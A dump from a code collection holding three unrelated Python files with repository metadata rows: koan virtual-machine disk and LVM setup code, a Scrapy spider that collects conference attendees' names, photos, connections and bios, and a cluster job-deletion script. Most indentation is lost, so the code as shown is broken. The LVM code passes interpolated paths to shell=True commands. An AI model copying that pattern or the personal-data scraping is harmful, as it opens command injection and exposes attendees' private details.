size = self.safe_load(data,'virt_ram','xen_ram',0)
err = False
try:
int(size)
except:
err = True
        if err or int(size) < default_ram:
err = True
if err:
print "invalid RAM size specified, using defaults."
return default_ram
return int(size)
#---------------------------------------------------
def calc_virt_cpus(self,data,default_cpus=1):
"""
        Assign virtual CPUs if none are given in the profile.
"""
size = self.safe_load(data,'virt_cpus',default=default_cpus)
try:
isize = int(size)
except:
traceback.print_exc()
return default_cpus
return isize
#---------------------------------------------------
def calc_virt_mac(self,data):
if not self.is_virt:
return None # irrelevant
if self.is_mac(self.system):
return self.system.upper()
return self.random_mac()
#---------------------------------------------------
def calc_virt_uuid(self,data):
# TODO: eventually we may want to allow some koan CLI
# option (or cobbler system option) for passing in the UUID.
# Until then, it's random.
return None
"""
Assign a UUID if none/invalid is given in the profile.
"""
my_id = self.safe_load(data,'virt_uuid','xen_uuid',0)
uuid_re = re.compile('[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}')
err = False
try:
str(my_id)
except:
err = True
        if my_id is None or my_id == '' or not uuid_re.match(str(my_id)):
err = True
if err and my_id is not None:
print "invalid UUID specified. randomizing..."
return None
return my_id
#----------------------------------------------------
def calc_virt_path(self,pd,name):
# input is either a single item or a string list
# it's not in the arguments to this function .. it's from one of many
# potential sources
location = self.virt_path
if location is None:
# no explicit CLI override, what did the cobbler server say?
location = self.safe_load(pd, 'virt_path', default=None)
if location is None or location == "":
# not set in cobbler either? then assume reasonable defaults
if self.virt_type in [ "xenpv", "xenfv" ]:
prefix = "/var/lib/xen/images/"
elif self.virt_type in [ "qemu", "kvm" ]:
prefix = "/var/lib/libvirt/images/"
elif self.virt_type == "vmwarew":
prefix = "/var/lib/vmware/%s/" % name
else:
prefix = "/var/lib/vmware/images/"
if not os.path.exists(prefix):
print "- creating: %s" % prefix
os.makedirs(prefix)
return [ "%s/%s-disk0" % (prefix, name) ]
# ok, so now we have a user that either through cobbler or some other
# source *did* specify a location. It might be a list.
virt_sizes = self.calc_virt_filesize(pd)
path_splitted = location.split(",")
paths = []
count = -1
for x in path_splitted:
count = count + 1
path = self.calc_virt_path2(pd,name,offset=count,location=x,sizes=virt_sizes)
paths.append(path)
return paths
#---------------------------------------------------
def calc_virt_path2(self,pd,name,offset=0,location=None,sizes=[]):
# Parse the command line to determine if this is a
# path, a partition, or a volume group parameter
# Ex: /foo
# Ex: partition:/dev/foo
# Ex: volume-group:/dev/foo/
        # choosing the disk image name (if applicable) is somewhat
# complicated ...
# use default location for the virt type
if not location.startswith("/dev/") and location.startswith("/"):
# filesystem path
if os.path.isdir(location):
return "%s/%s-disk%s" % (location, name, offset)
elif not os.path.exists(location) and os.path.isdir(os.path.dirname(location)):
return location
else:
if self.force_path:
return location
else:
raise InfoException, "The location %s is an existing file. Consider '--force-path' to overwrite it." % location
elif location.startswith("/dev/"):
# partition
if os.path.exists(location):
return location
else:
raise InfoException, "virt path is not a valid block device"
else:
# it's a volume group, verify that it exists
args = "vgs -o vg_name"
print "%s" % args
vgnames = sub_process.Popen(args, shell=True, stdout=sub_process.PIPE).communicate()[0]
print vgnames
if vgnames.find(location) == -1:
raise InfoException, "The volume group [%s] does not exist." % location
# check free space
args = "LANG=C vgs --noheadings -o vg_free --units g %s" % location
print args
cmd = sub_process.Popen(args, stdout=sub_process.PIPE, shell=True)
freespace_str = cmd.communicate()[0]
freespace_str = freespace_str.split("\n")[0].strip()
freespace_str = freespace_str.lower().replace("g","").replace(',', '.') # remove gigabytes
print "(%s)" % freespace_str
freespace = int(float(freespace_str))
virt_size = self.calc_virt_filesize(pd)
if len(virt_size) > offset:
virt_size = sizes[offset]
else:
                virt_size = sizes[-1]
if freespace >= int(virt_size):
# look for LVM partition named foo, create if doesn't exist
args = "lvs -o lv_name %s" % location
print "%s" % args
lvs_str=sub_process.Popen(args, stdout=sub_process.PIPE, shell=True).communicate()[0]
print lvs_str
name = "%s-disk%s" % (name,offset)
# have to create it?
if lvs_str.find(name) == -1:
args = "lvcreate -L %sG -n %s %s" % (virt_size, name, location)
print "%s" % args
lv_create = sub_process.call(args, shell=True)
if lv_create != 0:
raise InfoException, "LVM creation failed"
# partition location
partition_location = "/dev/mapper/%s-%s" % (location,name.replace('-','--'))
# check whether we have SELinux enabled system
args = "/usr/sbin/selinuxenabled"
selinuxenabled = sub_process.call(args)
if selinuxenabled == 0:
# required context type
context_type = "virt_image_t"
# change security context type to required one
args = "/usr/bin/chcon -t %s %s" % (context_type, partition_location)
print "%s" % args
change_context = sub_process.call(args, close_fds=True, shell=True)
# modify SELinux policy in order to preserve security context
# between reboots
args = "/usr/sbin/semanage fcontext -a -t %s %s" % (context_type, partition_location)
print "%s" % args
change_context |= sub_process.call(args, close_fds=True, shell=True)
if change_context != 0:
raise InfoException, "SELinux security context setting to LVM partition failed"
# return partition location
return partition_location
else:
raise InfoException, "volume group needs %s GB free space." % virt_size
def randomUUID(self):
"""
Generate a random UUID. Copied from xend/uuid.py
"""
rc = []
for x in range(0, 16):
rc.append(random.randint(0,255))
return rc
def uuidToString(self, u):
"""
return uuid as a string
"""
return "-".join(["%02x" * 4, "%02x" * 2, "%02x" * 2, "%02x" * 2,
"%02x" * 6]) % tuple(u)
def get_uuid(self,uuid):
"""
return the passed-in uuid, or a random one if it's not set.
"""
if uuid:
return uuid
return self.uuidToString(self.randomUUID())
if __name__ == "__main__":
main()
|
gpl-2.0
| -3,040,904,404,183,310,000 | 38.412829 | 161 | 0.508103 | false |
Lazar-T/conference-crawler
|
openStack/spiders/openStackSpider.py
|
1
|
2023
|
# -*- coding: utf-8 -*-
import urlparse
from scrapy.http import Request
from scrapy.loader import ItemLoader
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.loader.processors import Compose, MapCompose
from w3lib.html import replace_escape_chars, remove_tags
from openStack.items import ItemloadItem
class ItemspiderSpider(CrawlSpider):
name = 'openstack'
allowed_domains = ['openstacksummitnovember2014paris.sched.org']
start_urls = ['http://openstacksummitnovember2014paris.sched.org/directory/attendees/']
rules = (
Rule(LinkExtractor(allow=('/directory/attendees/\d+')),
callback='parse_page', follow=True),)
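    # follow links matching /directory/attendees/<digits> (presumably the
    # paginated attendee directory) and hand each matched page to parse_page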
def parse_page(self, response):
"""Yields all attendee urls.
@url http://openstacksummitnovember2014paris.sched.org/directory/attendees/
@scrapes attendees
"""
attendees = response.xpath('//h2/a/@href').extract()
for attendee in attendees:
yield Request(urlparse.urljoin(response.url, attendee),
callback=self.parse_item)
def parse_item(self, response):
""" Returns fields from each individual attendee.
@url http://openstacksummitnovember2014paris.sched.org/cfb
@scrapes name image_url friends title_company_location links about
"""
l = ItemLoader(item=ItemloadItem(), response=response)
l.default_output_processor = MapCompose(lambda v: v.strip(), replace_escape_chars)
l.add_xpath('name', '//*[@id="sched-page-me-name"]/text()')
l.add_xpath('image_url', '//*[@id="myavatar"]/@src')
l.add_xpath('friends', '//*[@id="sched-page-me-connections"]/ul/li/a/@title')
l.add_xpath('title_company_location', '//*[@id="sched-page-me-profile-data"]/text()')
l.add_xpath('links', '//*[@class="sched-network-link"]/a/@href')
l.add_xpath('about', '//*[@id="sched-page-me-profile-about"]/text()')
return l.load_item()
|
mit
| 6,775,172,230,990,549,000 | 37.903846 | 93 | 0.659911 | false |
ClaudioNahmad/Servicio-Social
|
Parametros/CosmoMC/CosmoMC-master/python/deleteJobs.py
|
1
|
1785
|
from __future__ import absolute_import
from __future__ import print_function
import subprocess
from paramgrid import batchjob_args, jobqueue
Opts = batchjob_args.batchArgs('Delete running or queued jobs', importance=True, batchPathOptional=True)
group = Opts.parser.add_mutually_exclusive_group()
group.add_argument('--queued', action='store_true')
group.add_argument('--running', action='store_true')
Opts.parser.add_argument('--delete_id_min', type=int)
Opts.parser.add_argument('--delete_id_range', nargs=2, type=int)
Opts.parser.add_argument('--delete_ids', nargs='+', type=int)
Opts.parser.add_argument('--confirm', action='store_true')
(batch, args) = Opts.parseForBatch()
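# with a batch directory, jobs can be deleted by id range/list or by the filtered
# batch item names; without one, only explicit job ids are deleted via qdel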
if batch:
if args.delete_id_range is not None:
jobqueue.deleteJobs(args.batchPath, jobId_minmax=args.delete_id_range, confirm=args.confirm)
if args.delete_id_min is not None:
jobqueue.deleteJobs(args.batchPath, jobId_min=args.delete_id_min, confirm=args.confirm)
elif args.delete_ids is not None:
jobqueue.deleteJobs(args.batchPath, args.delete_ids, confirm=args.confirm)
else:
items = [jobItem for jobItem in Opts.filteredBatchItems()]
batchNames = set([jobItem.name for jobItem in items])
jobqueue.deleteJobs(args.batchPath, rootNames=batchNames, confirm=args.confirm)
if not args.confirm: print('jobs not actually deleted: add --confirm to really cancel them')
else:
ids = []
if args.delete_id_range is not None: ids = list(range(args.delete_id_range[0], args.delete_id_range[1] + 1))
elif args.delete_ids is not None: ids += args.delete_ids
else: print('Must give --delete_id_range or --delete_ids if no batch directory')
for jobId in ids:
subprocess.check_output('qdel ' + str(jobId), shell=True)
|
gpl-3.0
| -3,567,789,519,922,405,400 | 43.625 | 112 | 0.716527 | false |